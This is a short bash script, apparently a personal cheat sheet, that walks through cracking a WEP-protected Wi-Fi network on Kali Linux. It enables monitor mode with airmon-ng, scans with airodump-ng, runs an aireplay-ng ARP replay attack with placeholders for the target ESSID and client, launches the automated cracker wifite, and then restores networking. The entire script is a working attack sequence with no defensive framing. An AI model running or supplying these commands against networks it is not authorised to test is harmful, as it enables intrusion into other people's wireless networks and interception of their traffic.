#!/bin/bash
# Tested on Kali GNU/Linux 1.1.0 as of 2015-07-06

## Scan the airwaves
service network-manager stop
airmon-ng start wlan0
airodump-ng mon0

## Crack using ARP replay
aireplay-ng --arpreplay -e <ESSID> -h <Test Client> mon0

## Point and shoot WEP cracking tool
/usr/bin/wifite

## Cleanup
airmon-ng stop mon0
service network-manager start
